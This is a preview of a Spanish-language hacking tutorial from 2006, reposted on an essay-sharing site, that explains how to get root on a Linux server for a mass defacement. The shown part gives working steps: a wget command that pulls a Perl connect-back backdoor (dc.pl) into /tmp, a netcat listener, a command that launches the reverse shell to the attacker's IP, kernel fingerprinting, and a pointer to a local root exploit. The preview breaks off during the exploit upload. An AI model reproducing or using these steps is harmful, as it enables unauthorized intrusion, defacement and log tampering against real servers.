Haciendo como root

Solo disponible en BuenasTareas
  • Páginas : 6 (1331 palabras )
  • Descarga(s) : 0
  • Publicado : 23 de mayo de 2011
Leer documento completo
Vista previa del texto
Acediendo Como R00t y Haciendo un Mass Defacement. *****9/10/2006****** By TX15 - ZeroHack Team ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~INDICE~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1-# Introdución 2-# Explicación de Permisos 3-# Acomodando Backshell en el Server 4-# Poniendo a la Escucha NetCat 5-# Onteniendo Informacion del Server 7-# Dar permisos y Ejecutar el Binario (r00texploit) 8-#Haciendo el Mass Defacement 9-# Borrando log's 10-# Despedida ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~ 1-# Introdución ~~~~~~~~~~~~~~ Hola Amigos! En este tutorial les voy a explicar como conseguir acesso r00t en un server LinuX. Tambien se explicara como hacer el mass defacement, borrar logs y algun par de cosas mas. Espero ke lesguste ;=) Empezemos con el asunto :P ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2-# Explicación de Permisos ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cuando tenemos haceso a un Server con una shell, nos fijamos que al lado de cada archivo o carpeta nos salen estas letras: (R) Lectura (W) Escritura (x) Ejecutación (d) Directorio (-) No tenemos

Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay,no les saldran los permisos que tene cada carpeta para verlos, en vez de solo poner ls, le añadimos -la Ejemplo: ls -la Y a la izquierda del todo les saldran hay los permisos ;) No solo les saldran los permisos, sino tambien la fecha que se subio, hora, etc... Weno pues hay se les kitaron las dudas, ya saben lo que significa cada letra :D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3-# AcomodandoBackshell en el Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ahora subimos una backshell como la datach0s o la in que son backshells en perl. Este tuto lo guiare con la datacha0s. La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos temporales y en un 99% de los servers tendremos permisos de escritura :D Para ir al directorio /tmp/ y subir la backshell ejecutaremos losiguiente: cd /tmp/;wget usuarios.lycos.es/teamzer0/backdoors/dc.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 4-# Poniendo a la Escucha NetCat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Una vez subida la dc.pl, dejamos el netcat en nuestro PC a la escucha, en este caso dejaremos a la escucha el puerto 9000 poniendo lo siguiente: -lvvp 9000 Cuando le pongamos a la escucha deberia aparecer lo siguiente: listening on [any] 9000... Ahora ya vamos a la shell y ejecutamos la dc.pl para conectarnos a nuestro PC de la siguiente manera: perl dc.pl TUIP PUERTOaLAescuchaENnetcat Ejemplo: perl dc.pl 10.0.1.251 9000 Nos Saldra lo siguiente en nuestra shell si se conecta a nuestro PC. Data Cha0s Connect Back Backdoor

[*] Dumping Arguments [*] Connecting... [*] Spawning Shell [*] Datached

Ahora nos fijamos en netcat y nosaparecera ke nos hemos conectado. Parecido a esto: connect to [81.47.74.9] from euirc.gr [66.225.230.248] 57566 Hay ya tamos conectados al server desde nuestro PC :D Weno ahora la php shell con lo ke subimos la dc y nos conectamos ya la podemos cerrar, ya que ahora aremos todo ejecutando comandos desde la shell ke tenemos en netcat :P ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 5-# Onteniendo Informaciondel Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ponemos en el netcat: pwd;uname -a Significado de cada Comando: id: Te dice en el Directorio que estas uname -a: Informacion del Sistema Al ejecutar eso les deberia salir algo parecido a esto: /tmp Linux server.corpoweb.com 2.4.20-021stab028.24.777-enterprise #1 SMP Fri Jan 6 9:39:27 MSK 2006 i686 athlon i386 GNU/Linux~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7-# Dar permisos y Ejecutar el Binario (r00texploit) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Weno una vez que ya sabemos el kernel (2.4.20) podemos ir a www.milw0rm.com y buscar su r00texploit.

En este caso utilizaremos el r00texploit "uselib24" Pero casi todos los binarios se utilizan igual de como realizaremos. Le subimos al server de esta manera: wget...
tracking img